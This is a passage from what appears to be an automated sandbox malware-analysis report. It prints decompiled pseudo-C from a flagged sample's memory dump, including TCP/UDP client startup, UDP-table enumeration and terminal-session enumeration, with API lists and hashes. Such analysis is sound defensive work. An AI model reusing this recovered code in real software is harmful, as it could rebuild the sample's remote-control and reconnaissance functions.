                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBCC0
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBCD2
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBCE4
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBCF6
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBD08
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBD1A
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBD2C
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBD3E
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBD50
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBD62
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBD74
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBD86
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBD98
                                                                                    • _free.LIBCMT ref: 04EEB9C8
                                                                                      • Part of subcall function 04EE8159: HeapFree.KERNEL32(00000000,00000000,?,04EE0EDA,00000001,00000001), ref: 04EE816F
                                                                                      • Part of subcall function 04EE8159: GetLastError.KERNEL32(3D21FB31,?,04EE0EDA,00000001,00000001), ref: 04EE8181
                                                                                    • _free.LIBCMT ref: 04EEB9EA
                                                                                    • _free.LIBCMT ref: 04EEB9FF
                                                                                    • _free.LIBCMT ref: 04EEBA0A
                                                                                    • _free.LIBCMT ref: 04EEBA2C
                                                                                    • _free.LIBCMT ref: 04EEBA3F
                                                                                    • _free.LIBCMT ref: 04EEBA4D
                                                                                    • _free.LIBCMT ref: 04EEBA58
                                                                                    • _free.LIBCMT ref: 04EEBA90
                                                                                    • _free.LIBCMT ref: 04EEBA97
                                                                                    • _free.LIBCMT ref: 04EEBAB4
                                                                                    • _free.LIBCMT ref: 04EEBACC
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                    • String ID:
                                                                                    • API String ID: 161543041-0
                                                                                    • Opcode ID: ecf9d5313286dd3b29d302e8cd7eee91687f425a9406bc1b68bfefe1708175ef
                                                                                    • Instruction ID: e884d6ca3f32f912369a5ef0ab41edadb4378b6ade07c6c2e6d26d34b8023baf
                                                                                    • Opcode Fuzzy Hash: ecf9d5313286dd3b29d302e8cd7eee91687f425a9406bc1b68bfefe1708175ef
                                                                                    • Instruction Fuzzy Hash: A93139716006059EEB21EB7BE844B7673E9FB00318F10692AE49DE7290DF32F9809761
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECE920, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 162networkCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 75%
                                                                                    			E04ECE920(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v36;
				char _v64;
				long _v68;
				intOrPtr _v72;
				signed int _t47;
				long _t60;
				long _t61;
				signed int _t69;
				intOrPtr _t76;
				intOrPtr _t82;
				intOrPtr* _t105;
				signed int _t109;

				_t47 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t47 ^ _t109;
				_t82 = _a4;
				_t105 = __ecx;
				_v72 = _a16;
				if( *((intOrPtr*)( *__ecx + 0xb0))() == 0) {
					L16:
					__eflags = _v8 ^ _t109;
					return E04ED572E(_v8 ^ _t109);
				} else {
					E04ECE8D0(__ecx + 0x148);
					_t113 =  *(__ecx + 0x50) - 3;
					if( *(__ecx + 0x50) != 3) {
						 *(__ecx + 0x48) = 1;
						SetLastError(0x139f);
						 *(_t105 + 0x148) = 0;
						goto L16;
					} else {
						 *(__ecx + 0x50) = 0;
						 *(__ecx + 0x148) = 0;
						 *((intOrPtr*)( *__ecx + 0xb4))();
						 *(__ecx + 0xc) = 1;
						_v36 = 0;
						_v64 = 0;
						 *((intOrPtr*)(__ecx + 0x10)) = 5;
						 *(__ecx + 0x14) = 0;
						 *(__ecx + 0x18) = 1;
						_v68 = 0;
						_t60 = E04ECEB90(_t82, __ecx, __ecx, _t113, _t82,  &_v36, _a8, _v72,  &_v64);
						if(_t60 == 0) {
							__imp__#111();
							 *(__ecx + 0x48) = 3;
							goto L13;
						} else {
							_t60 = E04ECD7B0(__ecx, __ecx, GetLastError,  &_v64,  &_v36, _a20);
							if(_t60 == 0) {
								__imp__#111();
								 *(__ecx + 0x48) = 4;
								L13:
								SetLastError(_t60);
								goto L14;
							} else {
								SetLastError(0);
								_push( *((intOrPtr*)(_t105 + 0x1c)));
								if( *((intOrPtr*)( *_t105 + 0x78))() == 2) {
									_t69 = GetLastError();
									__eflags = _t69;
									_t70 =  ==  ? 0x4c7 : _t69;
									E04ECE7F0(_t105, 5, "CTcpClient::Start",  ==  ? 0x4c7 : _t69);
									goto L14;
								} else {
									_t98 = _t105;
									if(E04ECECF0( &_v36, _t105,  &_v36, _a12) == 0) {
										__imp__#111();
										E04ECE7F0(_t105, 0xb, "CTcpClient::Start", _t73);
										goto L14;
									} else {
										_t76 = E04EDF4C7(_t98, 0, 0, E04ECEDD0, _t105, 0, _t105 + 0x44);
										 *((intOrPtr*)(_t105 + 0x40)) = _t76;
										if(_t76 == 0) {
											E04ECE7F0(_t105, 8, "CTcpClient::Start", 0x65f);
											L14:
											 *(_t105 + 0xc) = 0;
											 *((intOrPtr*)(_t105 + 0x10)) = 5;
											 *(_t105 + 0x14) = 0;
											 *(_t105 + 0x18) = 1;
											_t61 = GetLastError();
											 *((intOrPtr*)( *_t105 + 4))();
											SetLastError(_t61);
											__eflags = _v8 ^ _t109;
											return E04ED572E(_v8 ^ _t109);
										} else {
											_v68 = 1;
											ResetEvent( *(_t105 + 4));
											return E04ED572E(_v8 ^ _t109);
										}
									}
								}
							}
						}
					}
				}
			}
















                                                                                    0x04ece926
                                                                                    0x04ece92d
                                                                                    0x04ece934
                                                                                    0x04ece939
                                                                                    0x04ece93b
                                                                                    0x04ece948
                                                                                    0x04eceb27
                                                                                    0x04eceb2e
                                                                                    0x04eceb39
                                                                                    0x04ece94e
                                                                                    0x04ece954
                                                                                    0x04ece959
                                                                                    0x04ece95d
                                                                                    0x04eceb10
                                                                                    0x04eceb17
                                                                                    0x04eceb1d
                                                                                    0x00000000
                                                                                    0x04ece963
                                                                                    0x04ece963
                                                                                    0x04ece96c
                                                                                    0x04ece978
                                                                                    0x04ece980
                                                                                    0x04ece987
                                                                                    0x04ece98d
                                                                                    0x04ece99b
                                                                                    0x04ece9a5
                                                                                    0x04ece9ae
                                                                                    0x04ece9b5
                                                                                    0x04ece9bc
                                                                                    0x04ece9c9
                                                                                    0x04eceab5
                                                                                    0x04eceabb
                                                                                    0x00000000
                                                                                    0x04ece9cf
                                                                                    0x04ece9dc
                                                                                    0x04ece9e3
                                                                                    0x04eceaa6
                                                                                    0x04eceaac
                                                                                    0x04eceac2
                                                                                    0x04eceac9
                                                                                    0x00000000
                                                                                    0x04ece9e9
                                                                                    0x04ece9f1
                                                                                    0x04ece9f7
                                                                                    0x04ecea00
                                                                                    0x04ecea89
                                                                                    0x04ecea8b
                                                                                    0x04ecea92
                                                                                    0x04ecea9f
                                                                                    0x00000000
                                                                                    0x04ecea06
                                                                                    0x04ecea0c
                                                                                    0x04ecea16
                                                                                    0x04ecea72
                                                                                    0x04ecea82
                                                                                    0x00000000
                                                                                    0x04ecea18
                                                                                    0x04ecea28
                                                                                    0x04ecea30
                                                                                    0x04ecea35
                                                                                    0x04ecea6b
                                                                                    0x04eceacb
                                                                                    0x04eceacb
                                                                                    0x04ecead2
                                                                                    0x04ecead9
                                                                                    0x04eceae0
                                                                                    0x04eceae7
                                                                                    0x04eceaef
                                                                                    0x04eceaf3
                                                                                    0x04eceafe
                                                                                    0x04eceb08
                                                                                    0x04ecea37
                                                                                    0x04ecea3a
                                                                                    0x04ecea41
                                                                                    0x04ecea5a
                                                                                    0x04ecea5a
                                                                                    0x04ecea35
                                                                                    0x04ecea16
                                                                                    0x04ecea00
                                                                                    0x04ece9e3
                                                                                    0x04ece9c9
                                                                                    0x04ece95d

                                                                                    APIs
                                                                                      • Part of subcall function 04ECE8D0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ECE8E5
                                                                                      • Part of subcall function 04ECE8D0: SwitchToThread.KERNEL32(?,?,00000000,04ECE352,?,00000000,04EB8415,74E5F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,04EB87E8), ref: 04ECE8FD
                                                                                    • SetLastError.KERNEL32(0000139F), ref: 04ECEB17
                                                                                      • Part of subcall function 04ECEB90: WSASetLastError.WS2_32(0000273F,?,?), ref: 04ECEC16
                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000001,?,?,00000001,?,?), ref: 04ECE9F1
                                                                                    • GetLastError.KERNEL32 ref: 04ECEA89
                                                                                      • Part of subcall function 04ECECF0: WSAEventSelect.WS2_32(?,?,00000030), ref: 04ECED04
                                                                                      • Part of subcall function 04ECECF0: connect.WS2_32(?,?,00000010), ref: 04ECED2C
                                                                                      • Part of subcall function 04ECECF0: WSAGetLastError.WS2_32 ref: 04ECED3F
                                                                                    • ResetEvent.KERNEL32(?), ref: 04ECEA41
                                                                                    • WSAGetLastError.WS2_32(?,00000005), ref: 04ECEA72
                                                                                    • WSAGetLastError.WS2_32(?,?,00000001,?,?,00000001,?,?), ref: 04ECEAA6
                                                                                    • WSAGetLastError.WS2_32(?,?,00000001,?,?), ref: 04ECEAB5
                                                                                    • SetLastError.KERNEL32(00000000), ref: 04ECEAC9
                                                                                    • GetLastError.KERNEL32 ref: 04ECEAE7
                                                                                    • SetLastError.KERNEL32(00000000), ref: 04ECEAF3
                                                                                      • Part of subcall function 04ECD7B0: htons.WS2_32(?), ref: 04ECD81E
                                                                                      • Part of subcall function 04ECD7B0: bind.WS2_32(?,00000002,0000001C), ref: 04ECD842
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$Event$CompareExchangeInterlockedResetSelectSwitchThreadbindconnecthtons
                                                                                    • String ID: CTcpClient::Start
                                                                                    • API String ID: 4138520258-3740072585
                                                                                    • Opcode ID: 885b2bc53596b21f276e4d66e1245c497c8f24576a19407a7398dbf995171200
                                                                                    • Instruction ID: ee9f2f63779d73044f407f74bce8c923f23fd3418c8354a7d0bc5995fb4496f6
                                                                                    • Opcode Fuzzy Hash: 885b2bc53596b21f276e4d66e1245c497c8f24576a19407a7398dbf995171200
                                                                                    • Instruction Fuzzy Hash: 6451B170700609EFEB14DFA9D948BAEB7B9FF88305F00511AE905D7290DB76B855CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECD3D0, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 162networkCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 71%
                                                                                    			E04ECD3D0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v36;
				char _v64;
				long _v68;
				intOrPtr _v72;
				void* __ebp;
				signed int _t47;
				long _t60;
				long _t61;
				signed int _t69;
				intOrPtr _t76;
				intOrPtr _t82;
				intOrPtr* _t105;
				signed int _t109;

				_t47 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t47 ^ _t109;
				_t82 = _a4;
				_t105 = __ecx;
				_v72 = _a16;
				if( *((intOrPtr*)( *__ecx + 0xb0))() == 0) {
					L16:
					__eflags = _v8 ^ _t109;
					return E04ED572E(_v8 ^ _t109);
				} else {
					E04ECE8D0(__ecx + 0x148);
					_t113 =  *(__ecx + 0x50) - 3;
					if( *(__ecx + 0x50) != 3) {
						 *(__ecx + 0x48) = 1;
						SetLastError(0x139f);
						 *(_t105 + 0x148) = 0;
						goto L16;
					} else {
						 *(__ecx + 0x50) = 0;
						 *(__ecx + 0x148) = 0;
						 *((intOrPtr*)( *__ecx + 0xb4))();
						 *(__ecx + 0xc) = 1;
						_v36 = 0;
						_v64 = 0;
						 *((intOrPtr*)(__ecx + 0x10)) = 5;
						 *(__ecx + 0x14) = 0;
						 *(__ecx + 0x18) = 1;
						_v68 = 0;
						_t60 = E04ECD670(_t82, __ecx, __ecx, __esi, _t113, _t82,  &_v36, _a8, _v72,  &_v64);
						if(_t60 == 0) {
							__imp__#111();
							 *(__ecx + 0x48) = 3;
							goto L13;
						} else {
							_t60 = E04ECD7B0(__ecx, __ecx, GetLastError,  &_v64,  &_v36, _a20);
							if(_t60 == 0) {
								__imp__#111();
								 *(__ecx + 0x48) = 4;
								L13:
								SetLastError(_t60);
								goto L14;
							} else {
								SetLastError(0);
								_push( *((intOrPtr*)(_t105 + 0x1c)));
								if( *((intOrPtr*)( *_t105 + 0x78))() == 2) {
									_t69 = GetLastError();
									__eflags = _t69;
									_t70 =  ==  ? 0x4c7 : _t69;
									E04ECE7F0(_t105, 5, "CUdpClient::Start",  ==  ? 0x4c7 : _t69);
									goto L14;
								} else {
									_push(_a12);
									_t98 = _t105;
									if(E04ECD8E0( &_v36, SetLastError, _t105, _t105,  &_v36) == 0) {
										__imp__#111();
										E04ECE7F0(_t105, 0xb, "CUdpClient::Start", _t73);
										goto L14;
									} else {
										_t76 = E04EDF4C7(_t98, 0, 0,  &M04ECDA10, _t105, 0, _t105 + 0x44);
										 *((intOrPtr*)(_t105 + 0x40)) = _t76;
										if(_t76 == 0) {
											E04ECE7F0(_t105, 8, "CUdpClient::Start", 0x65f);
											L14:
											 *(_t105 + 0xc) = 0;
											 *((intOrPtr*)(_t105 + 0x10)) = 5;
											 *(_t105 + 0x14) = 0;
											 *(_t105 + 0x18) = 1;
											_t61 = GetLastError();
											 *((intOrPtr*)( *_t105 + 4))();
											SetLastError(_t61);
											__eflags = _v8 ^ _t109;
											return E04ED572E(_v8 ^ _t109);
										} else {
											_v68 = 1;
											ResetEvent( *(_t105 + 4));
											return E04ED572E(_v8 ^ _t109);
										}
									}
								}
							}
						}
					}
				}
			}

















                                                                                    0x04ecd3d6
                                                                                    0x04ecd3dd
                                                                                    0x04ecd3e4
                                                                                    0x04ecd3e9
                                                                                    0x04ecd3eb
                                                                                    0x04ecd3f8
                                                                                    0x04ecd5d7
                                                                                    0x04ecd5de
                                                                                    0x04ecd5e9
                                                                                    0x04ecd3fe
                                                                                    0x04ecd404
                                                                                    0x04ecd409
                                                                                    0x04ecd40d
                                                                                    0x04ecd5c0
                                                                                    0x04ecd5c7
                                                                                    0x04ecd5cd
                                                                                    0x00000000
                                                                                    0x04ecd413
                                                                                    0x04ecd413
                                                                                    0x04ecd41c
                                                                                    0x04ecd428
                                                                                    0x04ecd430
                                                                                    0x04ecd437
                                                                                    0x04ecd43d
                                                                                    0x04ecd44b
                                                                                    0x04ecd455
                                                                                    0x04ecd45e
                                                                                    0x04ecd465
                                                                                    0x04ecd46c
                                                                                    0x04ecd479
                                                                                    0x04ecd565
                                                                                    0x04ecd56b
                                                                                    0x00000000
                                                                                    0x04ecd47f
                                                                                    0x04ecd48c
                                                                                    0x04ecd493
                                                                                    0x04ecd556
                                                                                    0x04ecd55c
                                                                                    0x04ecd572
                                                                                    0x04ecd579
                                                                                    0x00000000
                                                                                    0x04ecd499
                                                                                    0x04ecd4a1
                                                                                    0x04ecd4a7
                                                                                    0x04ecd4b0
                                                                                    0x04ecd539
                                                                                    0x04ecd53b
                                                                                    0x04ecd542
                                                                                    0x04ecd54f
                                                                                    0x00000000
                                                                                    0x04ecd4b6
                                                                                    0x04ecd4b6
                                                                                    0x04ecd4bc
                                                                                    0x04ecd4c6
                                                                                    0x04ecd522
                                                                                    0x04ecd532
                                                                                    0x00000000
                                                                                    0x04ecd4c8
                                                                                    0x04ecd4d8
                                                                                    0x04ecd4e0
                                                                                    0x04ecd4e5
                                                                                    0x04ecd51b
                                                                                    0x04ecd57b
                                                                                    0x04ecd57b
                                                                                    0x04ecd582
                                                                                    0x04ecd589
                                                                                    0x04ecd590
                                                                                    0x04ecd597
                                                                                    0x04ecd59f
                                                                                    0x04ecd5a3
                                                                                    0x04ecd5ae
                                                                                    0x04ecd5b8
                                                                                    0x04ecd4e7
                                                                                    0x04ecd4ea
                                                                                    0x04ecd4f1
                                                                                    0x04ecd50a
                                                                                    0x04ecd50a
                                                                                    0x04ecd4e5
                                                                                    0x04ecd4c6
                                                                                    0x04ecd4b0
                                                                                    0x04ecd493
                                                                                    0x04ecd479
                                                                                    0x04ecd40d

                                                                                    APIs
                                                                                      • Part of subcall function 04ECE8D0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ECE8E5
                                                                                      • Part of subcall function 04ECE8D0: SwitchToThread.KERNEL32(?,?,00000000,04ECE352,?,00000000,04EB8415,74E5F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,04EB87E8), ref: 04ECE8FD
                                                                                    • SetLastError.KERNEL32(0000139F), ref: 04ECD5C7
                                                                                      • Part of subcall function 04ECD670: WSASetLastError.WS2_32(0000273F,?,?), ref: 04ECD6F6
                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000001,?,?,00000001,?,?), ref: 04ECD4A1
                                                                                    • GetLastError.KERNEL32 ref: 04ECD539
                                                                                      • Part of subcall function 04ECD8E0: WSAEventSelect.WS2_32(?,?,00000030), ref: 04ECD8F6
                                                                                      • Part of subcall function 04ECD8E0: connect.WS2_32(?,?,00000010), ref: 04ECD91E
                                                                                      • Part of subcall function 04ECD8E0: WSAGetLastError.WS2_32(?,74E04D40,?,04ECD4C4,?,00000005), ref: 04ECD931
                                                                                    • ResetEvent.KERNEL32(?), ref: 04ECD4F1
                                                                                    • WSAGetLastError.WS2_32(?,00000005), ref: 04ECD522
                                                                                    • WSAGetLastError.WS2_32(?,?,00000001,?,?,00000001,?,?), ref: 04ECD556
                                                                                    • WSAGetLastError.WS2_32(?,?,00000001,?,?), ref: 04ECD565
                                                                                    • SetLastError.KERNEL32(00000000), ref: 04ECD579
                                                                                    • GetLastError.KERNEL32 ref: 04ECD597
                                                                                    • SetLastError.KERNEL32(00000000), ref: 04ECD5A3
                                                                                      • Part of subcall function 04ECD7B0: htons.WS2_32(?), ref: 04ECD81E
                                                                                      • Part of subcall function 04ECD7B0: bind.WS2_32(?,00000002,0000001C), ref: 04ECD842
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$Event$CompareExchangeInterlockedResetSelectSwitchThreadbindconnecthtons
                                                                                    • String ID: CUdpClient::Start
                                                                                    • API String ID: 4138520258-3951387650
                                                                                    • Opcode ID: 02dc0914ceae25e1b60692f78a0ee3eeea0b87a40dfa623d95532d160fa7265b
                                                                                    • Instruction ID: ecf4840f7de9df17ae2a465c8647c363f7020ded39700702fee0ce3910dc0fab
                                                                                    • Opcode Fuzzy Hash: 02dc0914ceae25e1b60692f78a0ee3eeea0b87a40dfa623d95532d160fa7265b
                                                                                    • Instruction Fuzzy Hash: 07515E70B00209EBDB14DF65DD48FAEB7B9FF88309F10112AE90597290DB76B955CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBD960, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 154memorystringlibraryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 58%
                                                                                    			E04EBD960(void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v16;
				short _v540;
				_Unknown_base(*)()* _v544;
				char _v548;
				signed int* _v552;
				long _v556;
				long _v560;
				intOrPtr _v576;
				_Unknown_base(*)() _v592;
				intOrPtr _v596;
				long _v600;
				long _v604;
				signed int _t44;
				struct HINSTANCE__* _t46;
				_Unknown_base(*)()* _t49;
				void* _t50;
				signed int* _t51;
				signed int* _t55;
				int _t67;
				signed int _t75;
				_Unknown_base(*)()* _t85;
				intOrPtr _t86;
				long _t87;
				intOrPtr _t91;
				long _t93;
				void* _t96;
				signed int* _t100;
				void* _t101;
				signed int _t106;
				void* _t109;
				signed int _t112;
				void* _t113;
				void* _t116;
				void* _t120;

				_t112 = (_t109 - 0x00000008 & 0xfffffff0) + 4;
				_v8 =  *((intOrPtr*)(_t109 + 4));
				_t106 = _t112;
				_t113 = _t112 - 0x258;
				_t44 =  *0x4f03008; // 0x3d21fb31
				_v16 = _t44 ^ _t106;
				_push(__esi);
				_t93 = 0;
				_v604 = 0;
				_v600 = 0;
				_t46 = LoadLibraryA("iphlpapi.dll");
				if(_t46 == 0) {
					L4:
					return E04ED572E(_v16 ^ _t106);
				} else {
					_t49 = GetProcAddress(_t46, "GetExtendedUdpTable");
					_v544 = _t49;
					_v548 = 0;
					_t50 =  *_t49(0,  &_v548, 1, 2, 1, 0);
					_t123 = _t50 - 0x7a;
					if(_t50 != 0x7a) {
						goto L4;
					} else {
						_push(_v548);
						_t51 = E04ED5785( &_v548, __esi, _t123);
						_t116 = _t113 + 4;
						_t100 = _t51;
						_v552 = _t100;
						_push(0);
						_push(1);
						_push(2);
						_push(1);
						_push( &_v548);
						_push(_t100);
						if(_v544() == 0) {
							_t101 = LocalAlloc(0x40, 0x2800);
							_v556 = 0;
							_t55 = _v552;
							__eflags =  *_t55;
							if( *_t55 > 0) {
								_t85 =  &(_t55[2]);
								_v544 = _t85;
								do {
									_v596 =  *((intOrPtr*)(_t85 - 4));
									_t86 =  *((intOrPtr*)(_t85 + 4));
									_push(_t86);
									_v592 =  *_t85;
									_v576 = _t86;
									E04EBD4B0(_t86,  &_v540);
									_t120 = _t116 + 4;
									_v560 = 0x22 + lstrlenW( &_v540) * 2 + _t93;
									_t67 = LocalSize(_t101);
									_t87 = _v560;
									__eflags = _t67 - _t87;
									if(_t67 < _t87) {
										_t101 = LocalReAlloc(_t101, _t87, 0x42);
									}
									asm("movups xmm0, [ebp-0x250]");
									asm("movups [edi+esi], xmm0");
									asm("movups xmm0, [ebp-0x240]");
									asm("movups [edi+esi+0x10], xmm0");
									_t96 = _t93 + 0x20;
									E04EDDC90(_t96 + _t101,  &_v540, 2 + lstrlenW( &_v540) * 2);
									_t116 = _t120 + 0xc;
									_t75 = lstrlenW( &_v540);
									_t91 = _v556 + 1;
									_t85 = _v544 + 0xc;
									_v556 = _t91;
									_v544 = _t85;
									_t93 = _t96 + _t75 * 2 + 2;
									__eflags = _t91 -  *_v552;
								} while (_t91 <  *_v552);
							}
							LocalReAlloc(_t101, _t93, 0x42);
							E04ED5777(_v552);
							__eflags = _v16 ^ _t106;
							return E04ED572E(_v16 ^ _t106, 0x10);
						} else {
							_push(0x10);
							E04ED5777(_t100);
							goto L4;
						}
					}
				}
			}






































                                                                                    0x04ebd969
                                                                                    0x04ebd970
                                                                                    0x04ebd974
                                                                                    0x04ebd976
                                                                                    0x04ebd97c
                                                                                    0x04ebd983
                                                                                    0x04ebd986
                                                                                    0x04ebd988
                                                                                    0x04ebd98f
                                                                                    0x04ebd995
                                                                                    0x04ebd99b
                                                                                    0x04ebd9a3
                                                                                    0x04ebda0d
                                                                                    0x04ebda21
                                                                                    0x04ebd9a5
                                                                                    0x04ebd9ab
                                                                                    0x04ebd9be
                                                                                    0x04ebd9c6
                                                                                    0x04ebd9cc
                                                                                    0x04ebd9ce
                                                                                    0x04ebd9d1
                                                                                    0x00000000
                                                                                    0x04ebd9d3
                                                                                    0x04ebd9d3
                                                                                    0x04ebd9d9
                                                                                    0x04ebd9de
                                                                                    0x04ebd9e1
                                                                                    0x04ebd9e9
                                                                                    0x04ebd9ef
                                                                                    0x04ebd9f0
                                                                                    0x04ebd9f2
                                                                                    0x04ebd9f4
                                                                                    0x04ebd9f6
                                                                                    0x04ebd9f7
                                                                                    0x04ebda00
                                                                                    0x04ebda2f
                                                                                    0x04ebda31
                                                                                    0x04ebda37
                                                                                    0x04ebda3d
                                                                                    0x04ebda3f
                                                                                    0x04ebda45
                                                                                    0x04ebda48
                                                                                    0x04ebda50
                                                                                    0x04ebda59
                                                                                    0x04ebda61
                                                                                    0x04ebda64
                                                                                    0x04ebda65
                                                                                    0x04ebda6b
                                                                                    0x04ebda71
                                                                                    0x04ebda76
                                                                                    0x04ebda90
                                                                                    0x04ebda96
                                                                                    0x04ebda9c
                                                                                    0x04ebdaa2
                                                                                    0x04ebdaa4
                                                                                    0x04ebdab0
                                                                                    0x04ebdab0
                                                                                    0x04ebdab2
                                                                                    0x04ebdac0
                                                                                    0x04ebdac4
                                                                                    0x04ebdacb
                                                                                    0x04ebdad0
                                                                                    0x04ebdaec
                                                                                    0x04ebdaf1
                                                                                    0x04ebdafb
                                                                                    0x04ebdb0d
                                                                                    0x04ebdb0e
                                                                                    0x04ebdb11
                                                                                    0x04ebdb1a
                                                                                    0x04ebdb26
                                                                                    0x04ebdb29
                                                                                    0x04ebdb29
                                                                                    0x04ebda50
                                                                                    0x04ebdb35
                                                                                    0x04ebdb45
                                                                                    0x04ebdb52
                                                                                    0x04ebdb61
                                                                                    0x04ebda02
                                                                                    0x04ebda02
                                                                                    0x04ebda05
                                                                                    0x00000000
                                                                                    0x04ebda0a
                                                                                    0x04ebda00
                                                                                    0x04ebd9d1

                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 04EBD99B
                                                                                    • GetProcAddress.KERNEL32(00000000,GetExtendedUdpTable), ref: 04EBD9AB
                                                                                    • LocalAlloc.KERNEL32(00000040,00002800), ref: 04EBDA29
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EBDA80
                                                                                    • LocalSize.KERNEL32 ref: 04EBDA96
                                                                                    • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 04EBDAAA
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EBDAD3
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EBDAFB
                                                                                    • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 04EBDB35
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$Alloclstrlen$AddressLibraryLoadProcSize
                                                                                    • String ID: GetExtendedUdpTable$iphlpapi.dll
                                                                                    • API String ID: 2444183403-1809394930
                                                                                    • Opcode ID: 8bc7abee5fc4bd5612d6793b3a01cb58a99ce29f1e2819a6614e55f403f627fc
                                                                                    • Instruction ID: a655f6705c17cd2c4cd4e45e4ee3691078f866f8df2bb593aa285dc1a8c55a62
                                                                                    • Opcode Fuzzy Hash: 8bc7abee5fc4bd5612d6793b3a01cb58a99ce29f1e2819a6614e55f403f627fc
                                                                                    • Instruction Fuzzy Hash: 9B519F75E41218ABDB20DF64DC89FEAB7B4EF94305F0041E9E909A3240EB746E80CF94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC70A0, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 117libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 43%
                                                                                    			E04EC70A0(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				struct _OSVERSIONINFOW _v284;
				void* _v288;
				char _v292;
				_Unknown_base(*)()* _v296;
				signed int _t26;
				_Unknown_base(*)()* _t36;
				struct HINSTANCE__* _t37;
				_Unknown_base(*)()* _t38;
				signed int _t43;
				signed int _t44;
				intOrPtr* _t50;
				intOrPtr* _t54;
				intOrPtr* _t55;
				intOrPtr _t58;
				signed int _t60;
				struct HINSTANCE__* _t62;
				intOrPtr _t64;
				signed int _t66;

				_t26 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t26 ^ _t66;
				_t60 = 0;
				E04EDDAD0(0,  &_v284, 0, 0x114);
				_v284.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v284);
				if(_v284.dwMajorVersion < 6) {
					L24:
					return E04ED572E(_v8 ^ _t66);
				} else {
					_t62 = LoadLibraryA("Wtsapi32.dll");
					if(_t62 != 0) {
						_t50 = GetProcAddress(_t62, "WTSEnumerateSessionsW");
						_t36 = GetProcAddress(_t62, "WTSFreeMemory");
						_v296 = _t36;
						if(_t50 == 0 || _t36 == 0) {
							L20:
							_t37 = LoadLibraryA("Kernel32.dll");
							if(_t37 != 0) {
								_t38 = GetProcAddress(_t37, "WTSGetActiveConsoleSessionId");
								if(_t38 != 0) {
									_t60 =  *_t38();
								}
							}
						} else {
							_v292 = 0;
							_push( &_v288);
							_v288 = 0;
							_push( &_v292);
							_push(1);
							_push(0);
							_push(0);
							if( *_t50() == 0) {
								goto L20;
							} else {
								_t58 = _v288;
								_t43 = 0;
								_t64 = _v292;
								if(_t58 == 0) {
									L12:
									_t44 = 0;
									if(_t58 != 0) {
										_t54 = _t64 + 8;
										while( *_t54 != 1) {
											_t44 = _t44 + 1;
											_t54 = _t54 + 0xc;
											if(_t44 < _t58) {
												continue;
											} else {
											}
											goto L18;
										}
